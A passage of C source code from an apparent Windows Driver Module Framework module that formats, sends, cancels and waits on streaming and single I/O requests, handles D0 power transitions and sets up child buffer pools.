InputMemory, _In_opt_ WDFMEMORY OutputMemory ) /*++ Routine Description: Format the Request based on Request Type specified in Module Config. Arguments: DmfModule - This Module's handle. Request - The request to format. 
RequestIoctlCode - IOCTL code for Request type ContinuousRequestTarget_RequestType_Ioctl or ContinuousRequestTarget_RequestType_InternalIoctl InputMemory - Handle to framework memory object which contains input data OutputMemory - Handle to framework memory object to receive output data Return Value: None --*/ { NTSTATUS ntStatus = STATUS_SUCCESS; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; FuncEntry(DMF_TRACE); moduleContext = DMF_CONTEXT_GET(DmfModule); // Prepare the request to be sent down. // DmfAssert(moduleContext->IoTarget != NULL); switch (RequestType) { case ContinuousRequestTarget_RequestType_Write: { ntStatus = WdfIoTargetFormatRequestForWrite(moduleContext->IoTarget, Request, InputMemory, NULL, NULL); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfIoTargetFormatRequestForWrite fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } break; } case ContinuousRequestTarget_RequestType_Read: { ntStatus = WdfIoTargetFormatRequestForRead(moduleContext->IoTarget, Request, OutputMemory, NULL, NULL); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfIoTargetFormatRequestForRead fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } break; } case ContinuousRequestTarget_RequestType_Ioctl: { ntStatus = WdfIoTargetFormatRequestForIoctl(moduleContext->IoTarget, Request, RequestIoctlCode, InputMemory, NULL, OutputMemory, NULL); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfIoTargetFormatRequestForIoctl fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } break; } #if !defined(DMF_USER_MODE) case ContinuousRequestTarget_RequestType_InternalIoctl: { ntStatus = WdfIoTargetFormatRequestForInternalIoctl(moduleContext->IoTarget, Request, RequestIoctlCode, InputMemory, NULL, OutputMemory, NULL); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfIoTargetFormatRequestForInternalIoctl fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } break; } #endif // !defined(DMF_USER_MODE) default: { ntStatus = STATUS_INVALID_PARAMETER; TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "Invalid RequestType:%d fails: ntStatus=%!STATUS!", RequestType, ntStatus); goto Exit; } } Exit: FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus); return ntStatus; } static NTSTATUS ContinuousRequestTarget_CreateBuffersAndFormatRequestForRequestType( _In_ DMFMODULE DmfModule, _In_ WDFREQUEST Request ) /*++ Routine Description: Create the required input and output buffers and format the Request based on Request Type specified in Module Config. Arguments: DmfModule - This Module's handle. Request - The request to format. Return Value: None --*/ { NTSTATUS ntStatus = STATUS_SUCCESS; WDFMEMORY requestOutputMemory; WDFMEMORY requestInputMemory; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; VOID* inputBuffer; size_t inputBufferSize; VOID* outputBuffer; VOID* inputBufferContext; VOID* outputBufferContext; FuncEntry(DMF_TRACE); moduleContext = DMF_CONTEXT_GET(DmfModule); moduleConfig = DMF_CONFIG_GET(DmfModule); // Create the input buffer for the request if the Client needs one. // requestInputMemory = NULL; if (moduleConfig->BufferInputSize > 0) { // Get an input buffer from the input buffer list. // NOTE: This is fast operation that involves only pointer manipulation unless the buffer list is empty // (which should not happen). // ntStatus = DMF_BufferPool_GetWithMemory(moduleContext->DmfModuleBufferPoolInput, &inputBuffer, &inputBufferContext, &requestInputMemory); if (! 
NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "DMF_BufferPool_GetWithMemory fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } inputBufferSize = moduleConfig->BufferInputSize; moduleConfig->EvtContinuousRequestTargetBufferInput(DmfModule, inputBuffer, &inputBufferSize, inputBufferContext); DmfAssert(inputBufferSize <= moduleConfig->BufferInputSize); } // Create the output buffer for the request if the Client needs one. // requestOutputMemory = NULL; if (moduleConfig->BufferOutputSize > 0) { // Get an output buffer from the output buffer list. // NOTE: This is fast operation that involves only pointer manipulation unless the buffer list is empty // (which should not happen). // ntStatus = DMF_BufferPool_GetWithMemory(moduleContext->DmfModuleBufferPoolOutput, &outputBuffer, &outputBufferContext, &requestOutputMemory); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "DMF_BufferPool_GetWithMemory fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } } ntStatus = ContinuousRequestTarget_FormatRequestForRequestType(DmfModule, Request, moduleConfig->RequestType, moduleConfig->ContinuousRequestTargetIoctl, requestInputMemory, requestOutputMemory); if (! NT_SUCCESS(ntStatus)) { TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_FormatRequestForRequestType fails: ntStatus=%!STATUS!", ntStatus); goto Exit; } Exit: FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus); return ntStatus; } static NTSTATUS ContinuousRequestTarget_StreamRequestSend( _In_ DMFMODULE DmfModule, _In_ WDFREQUEST Request ) /*++ Routine Description: Send a single asynchronous request down the stack. Arguments: DmfModule - This Module's handle. Request - The request to send or NULL if the request should be created. Return Value: None --*/ { NTSTATUS ntStatus; BOOLEAN requestSendResult; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; FuncEntry(DMF_TRACE); moduleContext = DMF_CONTEXT_GET(DmfModule); // A new request will be sent down the stack. Count it so we can verify when // it returns. // InterlockedIncrement(&moduleContext->PendingStreamingRequests); DMF_ModuleReference(DmfModule); #if !defined(DMF_USER_MODE) // A new request will be sent down the stack. Increase Rundown ref until // send request has been made. // if (DMF_Portable_Rundown_Acquire(&moduleContext->StreamRequestsRundown)) { #endif // Reuse the request // WDF_REQUEST_REUSE_PARAMS requestParams; WDF_REQUEST_REUSE_PARAMS_INIT(&requestParams, WDF_REQUEST_REUSE_NO_FLAGS, STATUS_SUCCESS); ntStatus = WdfRequestReuse(Request, &requestParams); // Simple reuse cannot fail. // DmfAssert(NT_SUCCESS(ntStatus)); ntStatus = ContinuousRequestTarget_CreateBuffersAndFormatRequestForRequestType(DmfModule, Request); if (NT_SUCCESS(ntStatus)) { // Set a CompletionRoutine callback function. It goes back into this Module which will // dispatch to the Client. // WdfRequestSetCompletionRoutine(Request, moduleContext->CompletionRoutineStream, (WDFCONTEXT) (DmfModule)); // Send the request - Asynchronous call, so check for Status if it fails. // If it succeeds, the Status will be checked in Completion Routine. // requestSendResult = WdfRequestSend(Request, moduleContext->IoTarget, WDF_NO_SEND_OPTIONS); if (! 
requestSendResult)
        {
            ntStatus = WdfRequestGetStatus(Request);
            DmfAssert(!NT_SUCCESS(ntStatus));
            TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfRequestSend fails: ntStatus=%!STATUS!", ntStatus);
        }
    }
    else
    {
        TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_CreateBuffersAndFormatRequestForRequestType fails: ntStatus=%!STATUS!", ntStatus);
    }
#if !defined(DMF_USER_MODE)
        DMF_Portable_Rundown_Release(&moduleContext->StreamRequestsRundown);
    }
    else
    {
        ntStatus = STATUS_CANCELLED;
    }
#endif

    if (!NT_SUCCESS(ntStatus))
    {
        // Unable to send the request. Decrement to account for the increment above.
        //
        InterlockedDecrement(&moduleContext->PendingStreamingRequests);
        DMF_ModuleDereference(DmfModule);
    }

    FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus);

    return ntStatus;
}

// 'Returning uninitialized memory'
//
#pragma warning(suppress:6101)
static
NTSTATUS
ContinuousRequestTarget_RequestCreateAndSend(
    _In_ DMFMODULE DmfModule,
    _In_ BOOLEAN IsSynchronousRequest,
    _In_ VOID* RequestBuffer,
    _In_ size_t RequestLength,
    _Out_ VOID* ResponseBuffer,
    _In_ size_t ResponseLength,
    _In_ ContinuousRequestTarget_RequestType RequestType,
    _In_ ULONG RequestIoctl,
    _In_ ULONG RequestTimeoutMilliseconds,
    _In_ ContinuousRequestTarget_CompletionOptions CompletionOption,
    _Out_opt_ size_t* BytesWritten,
    _In_opt_ EVT_DMF_ContinuousRequestTarget_SendCompletion* EvtContinuousRequestTargetSingleAsynchronousRequest,
    _In_opt_ VOID* SingleAsynchronousRequestClientContext
    )
/*++

Routine Description:

    Creates and sends a synchronous or asynchronous request to the IoTarget given a buffer,
    IOCTL and other information.

Arguments:

    DmfModule - This Module's handle.
    IsSynchronousRequest - TRUE if the request is sent synchronously.
    RequestBuffer - Buffer of data to attach to request to be sent.
    RequestLength - Number of bytes in RequestBuffer to send.
    ResponseBuffer - Buffer of data that is returned by the request.
    ResponseLength - Size of Response Buffer in bytes.
    RequestType - Read or Write or Ioctl.
    RequestIoctl - The given IOCTL.
    RequestTimeoutMilliseconds - Timeout value in milliseconds of the transfer or zero for no timeout.
    CompletionOption - Completion option associated with the completion routine.
    BytesWritten - Bytes returned by the transaction.
    EvtContinuousRequestTargetSingleAsynchronousRequest - Completion routine.
    SingleAsynchronousRequestClientContext - Client context returned in completion routine.

Return Value:

    STATUS_SUCCESS if the request was created and sent; other NTSTATUS if there is an error.

--*/
{
    NTSTATUS ntStatus;
    WDFREQUEST request;
    WDFMEMORY memoryForRequest;
    WDFMEMORY memoryForResponse;
    WDF_OBJECT_ATTRIBUTES requestAttributes;
    WDF_OBJECT_ATTRIBUTES memoryAttributes;
    WDF_REQUEST_SEND_OPTIONS sendOptions;
    size_t outputBufferSize;
    BOOLEAN requestSendResult;
    DMF_CONTEXT_ContinuousRequestTarget* moduleContext;
    DMF_CONFIG_ContinuousRequestTarget* moduleConfig;
    WDFDEVICE device;
    EVT_WDF_REQUEST_COMPLETION_ROUTINE* completionRoutineSingle;
    ContinuousRequestTarget_SingleAsynchronousRequestContext* singleAsynchronousRequestContext;
    VOID* singleBufferContext;

    FuncEntry(DMF_TRACE);

    outputBufferSize = 0;
    requestSendResult = FALSE;

    DmfAssert((IsSynchronousRequest && (EvtContinuousRequestTargetSingleAsynchronousRequest == NULL)) ||
              (! IsSynchronousRequest));

    moduleContext = DMF_CONTEXT_GET(DmfModule);
    DmfAssert(moduleContext->IoTarget != NULL);

    device = DMF_ParentDeviceGet(DmfModule);
    moduleConfig = DMF_CONFIG_GET(DmfModule);

    WDF_OBJECT_ATTRIBUTES_INIT(&requestAttributes);
    requestAttributes.ParentObject = device;
    request = NULL;
    ntStatus = WdfRequestCreate(&requestAttributes,
                                moduleContext->IoTarget,
                                &request);
    if (! NT_SUCCESS(ntStatus))
    {
        request = NULL;
        TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfRequestCreate fails: ntStatus=%!STATUS!", ntStatus);
        return ntStatus;
    }

    WDF_OBJECT_ATTRIBUTES_INIT(&memoryAttributes);
    memoryAttributes.ParentObject = request;

    memoryForRequest = NULL;
    if (RequestLength > 0)
    {
        DmfAssert(RequestBuffer != NULL);
        ntStatus = WdfMemoryCreatePreallocated(&memoryAttributes,
                                               RequestBuffer,
                                               RequestLength,
                                               &memoryForRequest);
        if (! NT_SUCCESS(ntStatus))
        {
            memoryForRequest = NULL;
            TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfMemoryCreatePreallocated for request fails: ntStatus=%!STATUS!", ntStatus);
            goto Exit;
        }
    }

    memoryForResponse = NULL;
    if (ResponseLength > 0)
    {
        DmfAssert(ResponseBuffer != NULL);
        ntStatus = WdfMemoryCreatePreallocated(&memoryAttributes,
                                               ResponseBuffer,
                                               ResponseLength,
                                               &memoryForResponse);
        if (! NT_SUCCESS(ntStatus))
        {
            memoryForResponse = NULL;
            TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfMemoryCreatePreallocated for response fails: ntStatus=%!STATUS!", ntStatus);
            goto Exit;
        }
    }

    ntStatus = ContinuousRequestTarget_FormatRequestForRequestType(DmfModule,
                                                                   request,
                                                                   RequestType,
                                                                   RequestIoctl,
                                                                   memoryForRequest,
                                                                   memoryForResponse);
    if (! NT_SUCCESS(ntStatus))
    {
        TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "ContinuousRequestTarget_FormatRequestForRequestType fails: ntStatus=%!STATUS!", ntStatus);
        goto Exit;
    }

    if (IsSynchronousRequest)
    {
        WDF_REQUEST_SEND_OPTIONS_INIT(&sendOptions,
                                      WDF_REQUEST_SEND_OPTION_SYNCHRONOUS |
                                      WDF_REQUEST_SEND_OPTION_TIMEOUT);
    }
    else
    {
        WDF_REQUEST_SEND_OPTIONS_INIT(&sendOptions,
                                      WDF_REQUEST_SEND_OPTION_TIMEOUT);

        // Get a single buffer from the single buffer list.
        // NOTE: This is a fast operation that involves only pointer manipulation unless the buffer list is empty
        //       (which should not happen).
        //
        ntStatus = DMF_BufferPool_Get(moduleContext->DmfModuleBufferPoolContext,
                                      (VOID**)&singleAsynchronousRequestContext,
                                      &singleBufferContext);
        if (! NT_SUCCESS(ntStatus))
        {
            TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "DMF_BufferPool_Get fails: ntStatus=%!STATUS!", ntStatus);
            goto Exit;
        }

        if (CompletionOption == ContinuousRequestTarget_CompletionOptions_Default)
        {
            completionRoutineSingle = ContinuousRequestTarget_CompletionRoutine;
        }
        else if (CompletionOption == ContinuousRequestTarget_CompletionOptions_Passive)
        {
            completionRoutineSingle = ContinuousRequestTarget_CompletionRoutinePassive;
        }
        else
        {
            completionRoutineSingle = ContinuousRequestTarget_CompletionRoutine;
            DmfAssert(FALSE);
        }

        singleAsynchronousRequestContext->DmfModule = DmfModule;
        singleAsynchronousRequestContext->SingleAsynchronousCallbackClientContext = SingleAsynchronousRequestClientContext;
        singleAsynchronousRequestContext->EvtContinuousRequestTargetSingleAsynchronousRequest = EvtContinuousRequestTargetSingleAsynchronousRequest;
        singleAsynchronousRequestContext->SingleAsynchronousRequestType = RequestType;

        // Set the completion routine to internal completion routine of this Module.
        //
        WdfRequestSetCompletionRoutine(request,
                                       completionRoutineSingle,
                                       singleAsynchronousRequestContext);
    }

    WDF_REQUEST_SEND_OPTIONS_SET_TIMEOUT(&sendOptions,
                                         WDF_REL_TIMEOUT_IN_MS(RequestTimeoutMilliseconds));

    ntStatus = WdfRequestAllocateTimer(request);
    if (! NT_SUCCESS(ntStatus))
    {
        TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfRequestAllocateTimer fails: ntStatus=%!STATUS!", ntStatus);
        goto Exit;
    }

    requestSendResult = WdfRequestSend(request,
                                       moduleContext->IoTarget,
                                       &sendOptions);

    if (! requestSendResult || IsSynchronousRequest)
    {
        ntStatus = WdfRequestGetStatus(request);
        if (! NT_SUCCESS(ntStatus))
        {
            TraceEvents(TRACE_LEVEL_ERROR, DMF_TRACE, "WdfRequestGetStatus returned ntStatus=%!STATUS!", ntStatus);
            goto Exit;
        }
        else
        {
            TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "WdfRequestSend completed with ntStatus=%!STATUS!", ntStatus);
            outputBufferSize = WdfRequestGetInformation(request);
        }
    }

Exit:

    if (BytesWritten != NULL)
    {
        *BytesWritten = outputBufferSize;
    }

    if (IsSynchronousRequest && request != NULL)
    {
        // Delete the request if it is synchronous.
        //
        WdfObjectDelete(request);
        request = NULL;
    }
    else if (! IsSynchronousRequest && ! NT_SUCCESS(ntStatus) && request != NULL)
    {
        // Delete the request if the asynchronous request failed.
        //
        WdfObjectDelete(request);
        request = NULL;
    }

    FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus);

    return ntStatus;
}
#pragma code_seg()

ScheduledTask_Result_Type
ContinuousRequestTarget_QueuedWorkitemCallbackSingle(
    _In_ DMFMODULE DmfModule,
    _In_ VOID* ClientBuffer,
    _In_ VOID* ClientBufferContext
    )
/*++

Routine Description:

    This routine does the work of the completion routine for a single asynchronous request, at PASSIVE_LEVEL.

Arguments:

    DmfModule - The QueuedWorkItem Dmf Module.
    ClientBuffer - The buffer that contains the context of work to be done.
    ClientBufferContext - Context associated with the buffer.

Return Value:

    ScheduledTask_WorkResult_Success

--*/
{
    DMFMODULE dmfModuleParent;
    ContinuousRequestTarget_QueuedWorkitemContext* workitemContext;

    UNREFERENCED_PARAMETER(ClientBufferContext);

    dmfModuleParent = DMF_ParentModuleGet(DmfModule);

    workitemContext = (ContinuousRequestTarget_QueuedWorkitemContext*)ClientBuffer;

    ContinuousRequestTarget_ProcessAsynchronousRequestSingle(dmfModuleParent,
                                                             workitemContext->Request,
                                                             &workitemContext->RequestCompletionParams,
                                                             workitemContext->SingleAsynchronousRequestContext);

    return ScheduledTask_WorkResult_Success;
}

ScheduledTask_Result_Type
ContinuousRequestTarget_QueuedWorkitemCallbackStream(
    _In_ DMFMODULE DmfModule,
    _In_ VOID* ClientBuffer,
    _In_ VOID* ClientBufferContext
    )
/*++

Routine Description:

    This routine does the work of the completion routine for stream asynchronous requests, at PASSIVE_LEVEL.

Arguments:

    DmfModule - The QueuedWorkItem Dmf Module.
    ClientBuffer - The buffer that contains the context of work to be done.
    ClientBufferContext - Context associated with the buffer.

Return Value:

    ScheduledTask_WorkResult_Success

--*/
{
    DMFMODULE dmfModuleParent;
    ContinuousRequestTarget_QueuedWorkitemContext* workitemContext;

    UNREFERENCED_PARAMETER(ClientBufferContext);

    dmfModuleParent = DMF_ParentModuleGet(DmfModule);

    workitemContext = (ContinuousRequestTarget_QueuedWorkitemContext*)ClientBuffer;

    TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Request=0x%p [Queued Callback]", workitemContext->Request);

    ContinuousRequestTarget_ProcessAsynchronousRequestStream(dmfModuleParent,
                                                             workitemContext->Request,
                                                             &workitemContext->RequestCompletionParams);

    return ScheduledTask_WorkResult_Success;
}

_IRQL_requires_max_(DISPATCH_LEVEL)
VOID
ContinuousRequestTarget_RequestsCancel(
    _In_ DMFMODULE DmfModule
    )
/*++

Routine Description:

    Cancel all the outstanding requests.

Arguments:

    DmfModule - This Module's handle.

Return Value:

    None

--*/
{
    DMF_CONTEXT_ContinuousRequestTarget* moduleContext;
    DMF_CONFIG_ContinuousRequestTarget* moduleConfig;
    WDFREQUEST request;

    FuncEntry(DMF_TRACE);

    moduleContext = DMF_CONTEXT_GET(DmfModule);
    moduleConfig = DMF_CONFIG_GET(DmfModule);

    // Tell the rest of the Module that Client has stopped streaming.
    // (It is possible this is called twice if removal of WDFIOTARGET occurs on a stream that starts/stops
    // automatically.)
    //
    moduleContext->Stopping = TRUE;

    // Cancel all requests from target. Do not wait until all pending requests have returned.
    //

#if !defined(DMF_USER_MODE)
    // 1. Make sure no new request will be sent.
    //
    TraceEvents(TRACE_LEVEL_INFORMATION, DMF_TRACE, "Start Rundown");
    DMF_Portable_Rundown_WaitForRundownProtectionRelease(&moduleContext->StreamRequestsRundown);
    DMF_Portable_Rundown_Completed(&moduleContext->StreamRequestsRundown);
#endif

    // 2. Cancel any pending WDF requests.
    //
    // NOTE: There is no need to lock because these requests always exist in this list.
    // NOTE: Get the total number from Config in case it has already started decrementing StreamRequestCount.
    //
    LONG requestsToCancel = (LONG)moduleConfig->ContinuousRequestCount;
    DmfAssert(moduleContext->StreamingRequestCount <= requestsToCancel);
    TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Cancel Pending Requests: START requestsToCancel=%d", requestsToCancel);
    for (LONG requestIndex = 0; requestIndex < requestsToCancel; requestIndex++)
    {
        request = (WDFREQUEST)WdfCollectionGetItem(moduleContext->CreatedStreamRequestsCollection,
                                                   requestIndex);
        TraceEvents(TRACE_LEVEL_INFORMATION, DMF_TRACE, "WdfRequestCancelSentRequest Request[%d]=0x%p", requestIndex, request);
        WdfRequestCancelSentRequest(request);
    }
    TraceEvents(TRACE_LEVEL_VERBOSE, DMF_TRACE, "Cancel Pending Requests: END");

    FuncExitVoid(DMF_TRACE);
}

_IRQL_requires_max_(PASSIVE_LEVEL)
VOID
ContinuousRequestTarget_StopAndWait(
    _In_ DMFMODULE DmfModule
    )
/*++

Routine Description:

    Stops streaming Asynchronous requests to the IoTarget and waits for all pending requests to return.

Arguments:

    DmfModule - This Module's handle.

Return Value:

    None

--*/
{
    DMF_CONTEXT_ContinuousRequestTarget* moduleContext;
    DMF_CONFIG_ContinuousRequestTarget* moduleConfig;

    FuncEntry(DMF_TRACE);

    moduleContext = DMF_CONTEXT_GET(DmfModule);
    moduleConfig = DMF_CONFIG_GET(DmfModule);

    DmfAssert(moduleContext->IoTarget != NULL);

    // Tell the rest of the Module that Client has stopped streaming.
    // (It is possible this is called twice if removal of WDFIOTARGET occurs on a stream that starts/stops
    // automatically.)
    //
    moduleContext->Stopping = TRUE;

    // Cancel all the outstanding requests.
    //
    ContinuousRequestTarget_RequestsCancel(DmfModule);
    TraceEvents(TRACE_LEVEL_INFORMATION, DMF_TRACE, "Wait for in-flight callback");

    // 3. Wait for any in-flight callback to return.
    //
#if !defined(DMF_USER_MODE)
    DMF_Portable_EventWaitForSingleObject(&moduleContext->StreamRequestsRundownCompletionEvent,
                                          FALSE,
                                          NULL);
#else
    // Once Rundown API is supported in User-mode, this code can be deleted.
    //
    while (moduleContext->PendingStreamingRequests > 0)
    {
        DMF_Utility_DelayMilliseconds(50);
    }
#endif
    TraceEvents(TRACE_LEVEL_INFORMATION, DMF_TRACE, "Rundown Completed");

    FuncExitVoid(DMF_TRACE);
}
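// Illustrative sketch (not part of this Module's implementation): the rundown-protection
// pattern the send and stop paths above rely on, shown with the kernel-mode
// EX_RUNDOWN_REF primitives. DMF_Portable_Rundown is assumed here to be a thin
// portability wrapper over these primitives; in User-mode no equivalent exists yet,
// which is why ContinuousRequestTarget_StopAndWait() falls back to polling
// PendingStreamingRequests. All 'Sketch_' names are hypothetical.
//
#if defined(SKETCH_ONLY)
typedef struct _SKETCH_STREAM
{
    EX_RUNDOWN_REF Rundown;
} SKETCH_STREAM;

VOID
Sketch_Initialize(
    _Inout_ SKETCH_STREAM* Stream
    )
{
    // Rundown starts in the "active" state: acquires will succeed.
    //
    ExInitializeRundownProtection(&Stream->Rundown);
}

NTSTATUS
Sketch_SendOne(
    _Inout_ SKETCH_STREAM* Stream
    )
{
    NTSTATUS ntStatus;

    if (ExAcquireRundownProtection(&Stream->Rundown))
    {
        // ...format and send the WDFREQUEST here...
        // (In the Module above, the matching release happens when the request
        // completes, not immediately after send; this sketch is simplified.)
        //
        ntStatus = STATUS_SUCCESS;
        ExReleaseRundownProtection(&Stream->Rundown);
    }
    else
    {
        // Rundown has started: no new requests may be sent.
        //
        ntStatus = STATUS_CANCELLED;
    }
    return ntStatus;
}

VOID
Sketch_Stop(
    _Inout_ SKETCH_STREAM* Stream
    )
{
    // 1. Block new acquisitions and wait for in-flight holders to release.
    //
    ExWaitForRundownProtectionRelease(&Stream->Rundown);
    // 2. Mark rundown complete so later acquires fail fast.
    //
    ExRundownCompleted(&Stream->Rundown);
}
#endif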
///////////////////////////////////////////////////////////////////////////////////////////////////////
// WDF Module Callbacks
///////////////////////////////////////////////////////////////////////////////////////////////////////
//

_IRQL_requires_max_(PASSIVE_LEVEL)
_Must_inspect_result_
static
NTSTATUS
DMF_ContinuousRequestTarget_ModuleD0Entry(
    _In_ DMFMODULE DmfModule,
    _In_ WDF_POWER_DEVICE_STATE PreviousState
    )
/*++

Routine Description:

    Callback for ModuleD0Entry for this Module. Some Clients require streaming to stop
    during D0Exit/D0Entry transitions. This code does that work on behalf of the Client.

Arguments:

    DmfModule - The given DMF Module.
    PreviousState - The WDF Power State that this DMF Module should exit from.

Return Value:

    NTSTATUS

--*/
{
    NTSTATUS ntStatus = STATUS_SUCCESS;
    DMF_CONTEXT_ContinuousRequestTarget* moduleContext;
    DMF_CONFIG_ContinuousRequestTarget* moduleConfig;

    FuncEntry(DMF_TRACE);

    moduleContext = DMF_CONTEXT_GET(DmfModule);
    moduleConfig = DMF_CONFIG_GET(DmfModule);

    // Send each WDFREQUEST this Module's instance has created to
    // its WDFIOTARGET.
    //
    if ((moduleConfig->CancelAndResendRequestInD0Callbacks) &&
        (moduleContext->IoTarget != NULL))
    {
        if (PreviousState == WdfPowerDeviceD3Final)
        {
            ntStatus = STATUS_SUCCESS;
        }
        else
        {
            ntStatus = DMF_ContinuousRequestTarget_Start(DmfModule);
        }
    }

    // Start the target on any power transition other than cold boot,
    // if PurgeAndStartTargetInD0Callbacks is set to TRUE.
    //
    if ((moduleConfig->PurgeAndStartTargetInD0Callbacks) &&
        (moduleContext->IoTarget != NULL))
    {
        if (PreviousState == WdfPowerDeviceD3Final)
        {
            ntStatus = STATUS_SUCCESS;
        }
        else
        {
            ntStatus = WdfIoTargetStart(moduleContext->IoTarget);
        }
    }

    FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus);

    return ntStatus;
}

_IRQL_requires_max_(PASSIVE_LEVEL)
_Must_inspect_result_
static
NTSTATUS
DMF_ContinuousRequestTarget_ModuleD0Exit(
    _In_ DMFMODULE DmfModule,
    _In_ WDF_POWER_DEVICE_STATE TargetState
    )
/*++

Routine Description:

    Callback for ModuleD0Exit for this Module. Some Clients require streaming to stop
    during D0Exit/D0Entry transitions. This code does that work on behalf of the Client.

Arguments:

    DmfModule - The given DMF Module.
    TargetState - The WDF Power State that this DMF Module will enter.

Return Value:

    NTSTATUS

--*/
{
    NTSTATUS ntStatus = STATUS_SUCCESS;
    DMF_CONTEXT_ContinuousRequestTarget* moduleContext;
    DMF_CONFIG_ContinuousRequestTarget* moduleConfig;

    FuncEntry(DMF_TRACE);

    UNREFERENCED_PARAMETER(TargetState);

    moduleContext = DMF_CONTEXT_GET(DmfModule);
    moduleConfig = DMF_CONFIG_GET(DmfModule);

    if ((moduleConfig->CancelAndResendRequestInD0Callbacks) &&
        (moduleContext->IoTarget != NULL))
    {
        DMF_ContinuousRequestTarget_StopAndWait(DmfModule);
    }

    if ((moduleConfig->PurgeAndStartTargetInD0Callbacks) &&
        (moduleContext->IoTarget != NULL))
    {
        WdfIoTargetPurge(moduleContext->IoTarget,
                         WdfIoTargetPurgeIoAndWait);
    }

    FuncExit(DMF_TRACE, "ntStatus=%!STATUS!", ntStatus);

    return ntStatus;
}

///////////////////////////////////////////////////////////////////////////////////////////////////////
// DMF Module Callbacks
///////////////////////////////////////////////////////////////////////////////////////////////////////
//

#pragma code_seg("PAGE")
_IRQL_requires_max_(PASSIVE_LEVEL)
VOID
DMF_ContinuousRequestTarget_ChildModulesAdd(
    _In_ DMFMODULE DmfModule,
    _In_ DMF_MODULE_ATTRIBUTES* DmfParentModuleAttributes,
    _In_ PDMFMODULE_INIT DmfModuleInit
    )
/*++

Routine Description:

    Configure and add the required Child Modules to the given Parent Module.

Arguments:

    DmfModule - The given Parent Module.
    DmfParentModuleAttributes - Pointer to the parent DMF_MODULE_ATTRIBUTES structure.
    DmfModuleInit - Opaque structure to be passed to DMF_DmfModuleAdd.
Return Value: None --*/ { DMF_MODULE_ATTRIBUTES moduleAttributes; DMF_CONFIG_ContinuousRequestTarget* moduleConfig; DMF_CONTEXT_ContinuousRequestTarget* moduleContext; DMF_CONFIG_BufferPool moduleConfigBufferPoolInput; DMF_CONFIG_BufferPool moduleConfigBufferPoolOutput; DMF_CONFIG_BufferPool moduleConfigBufferPoolContext; DMF_CONFIG_QueuedWorkItem moduleConfigQueuedWorkItemStream; DMF_CONFIG_QueuedWorkItem moduleConfigQueuedWorkItemSingle; PAGED_CODE(); FuncEntry(DMF_TRACE); moduleConfig = DMF_CONFIG_GET(DmfModule); moduleContext = DMF_CONTEXT_GET(DmfModule); // Create buffer pools for input and output buffers only if they are needed. // if (moduleConfig->BufferInputSize > 0) { // BufferPoolInput // --------------- // DMF_CONFIG_BufferPool_AND_ATTRIBUTES_INIT(&moduleConfigBufferPoolInput, &moduleAttributes); moduleConfigBufferPoolInput.BufferPoolMode = BufferPool_Mode_Source; moduleConfigBufferPoolInput.Mode.SourceSettings.EnableLookAside = FALSE; moduleConfigBufferPoolInput.Mode.SourceSettings.BufferCount = moduleConfig->BufferCountInput; moduleConfigBufferPoolInput.Mode.SourceSettings.PoolType = moduleConfig->PoolTypeInput; moduleConfigBufferPoolInput.Mode.SourceSettings.BufferSize = moduleConfig->BufferInputSize; moduleConfigBufferPoolInput.Mode.SourceSettings.BufferContextSize = moduleConfig->BufferContextInputSize; moduleAttributes.ClientModuleInstanceName = "BufferPoolInput"; moduleAttributes.PassiveLevel = DmfParentModuleAttributes->PassiveLevel; DMF_DmfModuleAdd(DmfModuleInit, &moduleAttributes, WDF_NO_OBJECT_ATTRIBUTES, &moduleContext->DmfModuleBufferPoolInput); } else { DmfAssert(moduleConfig->BufferCountInput == 0); } if (moduleConfig->BufferOutputSize > 0) { // BufferPoolOutput // ---------------- // DMF_CONFIG_BufferPool_AND_ATTRIBUTES_INIT(&moduleConfigBufferPoolOutput, &moduleAttributes); moduleConfigBufferPoolOutput.BufferPoolMode = BufferPool_Mode_Source; moduleConfigBufferPoolOutput.Mode.SourceSettings.EnableLookAside = moduleConfig->EnableLookAsideOutput; moduleConfigBufferPoolOutput.Mode.SourceSettings.BufferCount = moduleConfig->BufferCountOutput; moduleConfigBufferPoolOutput.Mode.SourceSettings.PoolType = moduleConfig->PoolTypeOutput; moduleConfigBufferPoolOutput.Mode.SourceSettings.BufferSize = moduleConfig->BufferOutputSize; moduleConfigBufferPoolOutput.Mode.SourceSettings.BufferContextSize = moduleConfig->BufferContextOutputSize; 